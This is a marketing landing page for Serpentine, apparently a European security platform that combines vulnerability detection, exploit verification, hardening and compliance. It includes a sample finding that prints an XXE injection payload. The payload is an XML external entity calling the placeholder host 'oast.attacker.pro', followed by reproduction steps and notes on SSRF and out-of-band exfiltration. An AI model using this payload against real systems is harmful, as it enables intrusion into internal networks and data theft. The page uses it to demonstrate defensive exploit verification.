The Unified European Security Platform
Your security stack is fragmented.Serpentine replaces it.
One platform unifying eight modules — detection, hardening, exploit verification, governance, investigation, identity oversight, data classification, and AI-security — on a single substrate, so every security signal shares one source of truth. Eight modules. Six intelligence layers. One substrate.
Sovereign EU infrastructure · No customer data used for training. · SOC 2 Type II: In progress
Substrate8
modules
6
intelligence layers
9
OSINT sources
35
compliance frameworks
3,144
mapped obligations
Follow a Finding
One finding, eight modules, complete coverage
Watch how a single vulnerability flows through the entire platform — from detection to investigation to compliance evidence.
Active finding
Exposed admin endpoint
Administrative access exposed without authentication
NAPAD
Automated exploit confirmed unauthenticated access. Data exfiltration possible.
Output
PoC captured • Impact assessed
Substrate
Updates exploitability status
The Problem
Security stacks were not built to work together.
Most teams run separate systems for audit, testing, hardening, and compliance. Each system creates its own output. None of those outputs become a shared operating state.
Fragmented operating model
Result: manual correlation, delayed validation, duplicated work across 8 disciplines
The Shift
From fragmented tools to one unified platform.
Serpentine does not add another dashboard. It changes where security work lives: one substrate across findings, validation, remediation, identity, data, AI-risk, and evidence.
Current State: Fragmented Tools
Detection
Vulnerability scanners
Hardening
Configuration scripts
Offense
Manual pentest
Governance
Spreadsheets
Investigation
SIEM queries
Identity
IAM consoles
Data
Data catalogs
AI-Security
Manual review
With Serpentine: Unified System
Detection
ODBRANA
Hardening
POSTAVA
Offense
NAPAD
Governance
REGULATIVA
Investigation
ISTRAGA
Identity
NADZOR
Data
PODATOCI
AI-Security
PROTIVAI
Reality Check
Security posture is often wrong.
Most systems claim controls are in place. Serpentine shows where reality breaks them.
Most security platforms tell you what you've declared. Serpentine tells you what's actually true.
Declared control state
All production access requires MFA
Policy assertion dated Jan 2024
Observed enforcement state
2 production systems have no MFA enforcement evidence
Detected by Detection (ODBRANA) scan + Governance (REGULATIVA) mapping + Oversight (NADZOR) identity analysis
Why this matters: Breaks SOC 2 attestation · Invalidates ISO control A.5.15
Declared control state
All critical findings are resolved
Based on ticket status in ticketing system
Observed enforcement state
Exploitability was never validated
3 findings closed without Offense (NAPAD) validation
Why this matters: Creates unverified risk exposure · False closure masks active vulnerabilities
Breaks SOC 2 attestation. Invalidates ISO A.5.15.
This is what Serpentine actually produces
XXE Injection — External Entity Processing
Content-Type: application/xml
<!DOCTYPE root [
<!ENTITY xxe SYSTEM
"http://oast.attacker.pro">
]>
...
DNS callback received from target infrastructure
CVSS 9.1 · CWE-611 · Evidence captured
Exploit Confirmed
Out-of-band DNS callback received
oast.attacker.pro → 203.0.113.42
Reproduction
Send XML payload to endpoint. Observe callback on controlled DNS server.
Proof
External entity resolution confirmed. SSRF to internal network possible.
Linked to finding ODB-2024-0847
Control Contradiction
Audit assertion invalidated. Control requires remediation evidence before re-attestation.
Adversarial Context
This XXE pattern matches campaign cluster NS-A7 TTPs (T1190 → T1059 → T1041). 12 documented exploitations in public threat research. Estimated attacker dwell time post-exploitation: 4-11 days.
Chained risk
If combined with weak egress filtering (detected on adjacent asset), enables out-of-band exfiltration of internal service map.
Recommended priority elevation: validate against authenticated paths within 72h.
Policy Applied
Configuration hardened. Drift monitoring enabled.
Identity Context
Identity risk elevates finding priority. Access review triggered.
Data Sensitivity
Data classification elevates breach scope. Notification timeline: 72h.
AI Risk Assessment
No AI-specific risks identified for this finding scope.
See what your system gets wrong
We'll show real contradictions in your environment.
Book a Demo30-minute technical walkthrough · No slides, real system
The Architecture
Inside the substrate.
Serpentine does not move data between disconnected tools. It stores findings, validation, remediation, evidence, controls, assets, identity, classification, AI-incidents, and research in one operating state.
W: POSTAVA
R: All
W: ODBRANA
R: NAPAD, REGULATIVA
W: NAPAD
R: POSTAVA, REGULATIVA
W: POSTAVA
R: REGULATIVA
W: All
R: REGULATIVA
W: REGULATIVA
R: All
W: NADZOR
R: All
W: PODATOCI
R: ODBRANA, ISTRAGA
W: PROTIVAI
R: ISTRAGA, REGULATIVA
W: ISTRAGA
R: All
Hover any entity to see which modules write and read it
This is not a dashboard aggregating external data. This is one substrate where every action updates the same state.
The Platform
One substrate. Eight modules.
Detect · Enforce · Challenge · Govern · Investigate · Oversee · Classify · AI-Secure — all on a single data layer.
Detection
(ODBRANA)
Continuous detection across web apps, APIs, infrastructure, and cloud. Findings carry evidence chains and priority scores that update in real time.
Hardening
(POSTAVA)
Automated server hardening applied once and monitored for drift. Any config change is a substrate event every module sees immediately.
Offense
(NAPAD)
Controlled exploit verification that proves which vulnerabilities are practically exploitable — not just present on a CVSS score.
Investigation
(ISTRAGA)
LLM-guided investigations, adversary emulations, corpus-backed reasoning grounded in substrate data.
Governance
(REGULATIVA)
Continuous compliance across 35 frameworks and 3,144 obligations. Evidence packets generated automatically.
Oversight
(NADZOR)
Identity intelligence over Entra ID, Okta, and GitHub. Identity findings on the same risk register as vulnerabilities.
Classification
(PODATOCI)
Data asset catalogue with PII/PCI/PHI/secret classification and a top-N exposure ranking.
AI-Security
(PROTIVAI)
Protects AI/LLM workloads — prompt-injection detection, model-supply-chain checks, AI-incident response.
All modules read and write to the same substrate. Every finding, identity signal, data classification, and compliance obligation shares one source of truth.
The Mechanism
How Serpentine turns findings into evidence.
Normalize
Detection (ODBRANA)
Turns scanner output into structured findings.
Updates the same operating state
Validate
Offense (NAPAD)
Confirms whether the risk is exploitable.
Updates the same operating state
Remediate
Hardening (POSTAVA)
Creates or applies hardening policy.
Updates the same operating state
Prove
Governance (REGULATIVA)
Maps the outcome to controls and evidence.
Updates the same operating state
Reason
Investigation (ISTRAGA)
Synthesises across all steps. Validates attack paths, predicts emerging risk.
Reads from all
The value is not the steps.
The value is that every step updates one system. Oversight (NADZOR), Classification (PODATOCI), and AI-Security (PROTIVAI) write into the same substrate continuously — so every step reflects identity, data, and AI-risk context.
Use Cases
Built for the teams responsible for proving security.
CISO
- Risk visibility across all domains
- Board-ready security posture
- Audit-ready evidence on demand
MSSP / Security Firm
- Repeatable delivery model
- Client-ready reporting
- Multi-tenant workflows
Industries
Built for environments where evidence matters.
Trust
Trust, published.
Security platforms cannot ask for trust while hiding their own controls. SPNT publishes its security posture, subprocessors, responsible disclosure policy, and data handling documentation.
What Serpentine is not
Honest boundaries
Serpentine does not try to replace everything. These are the systems it complements.
Not an EDR
Serpentine does not deploy endpoint agents. Host-level process forensics, real-time syscall monitoring, and post-compromise endpoint hunting require a dedicated endpoint platform. Serpentine handles cloud, identity, and attack-surface coverage. The two are complementary.
Not a SIEM
Serpentine does not retain raw logs. The telemetry layer normalises cloud-audit and identity events into structured graph records — useful for correlation and reasoning, not for petabyte-scale search or custom rule authoring. Organisations needing full raw-log retention should run Serpentine alongside a dedicated SIEM.
Not a CSPM
A dedicated cloud-posture platform may have broader inventory coverage across dozens of cloud accounts. Serpentine prioritises depth over breadth: every finding it surfaces is graph-grounded, exploit-validated, and tied to a compliance obligation. For "which of these actually matters today?" rather than "how many misconfigs do we have?", Serpentine's model is the right one.
The Pilot
30 / 60 / 90 day framework
A structured pilot that proves value before commitment.
Day 30 — Coverage
- Detection module connected to production assets
- First OSINT enrichment loop running
- Initial finding register delivered
Day 60 — Validation
- Offensive validation on highest-priority findings
- Hardening policy generated for two control gaps
- First control-contradiction report delivered to your CISO
Day 90 — Evidence
- Compliance mapping complete for chosen framework (SOC 2 / ISO 27001 / NIS2 / DORA)
- First Investigation (ISTRAGA) consequence analysis published
- Pilot decision: continue, expand, or stop — your call
Pilot guarantee — if at day 90 the pilot has not produced audit-ready evidence on at least one framework, the pilot fee is refunded in full. Refund applies to the pilot engagement only; does not extend to subsequent commercial contracts.
This is not a demo environment. This is how your system will be evaluated.
One finding. Full lifecycle. Real validation.
See what your current stack misses.
Book a live walkthrough. We will show how one finding exposes gaps in validation, remediation, evidence, and adversarial context that most teams never see.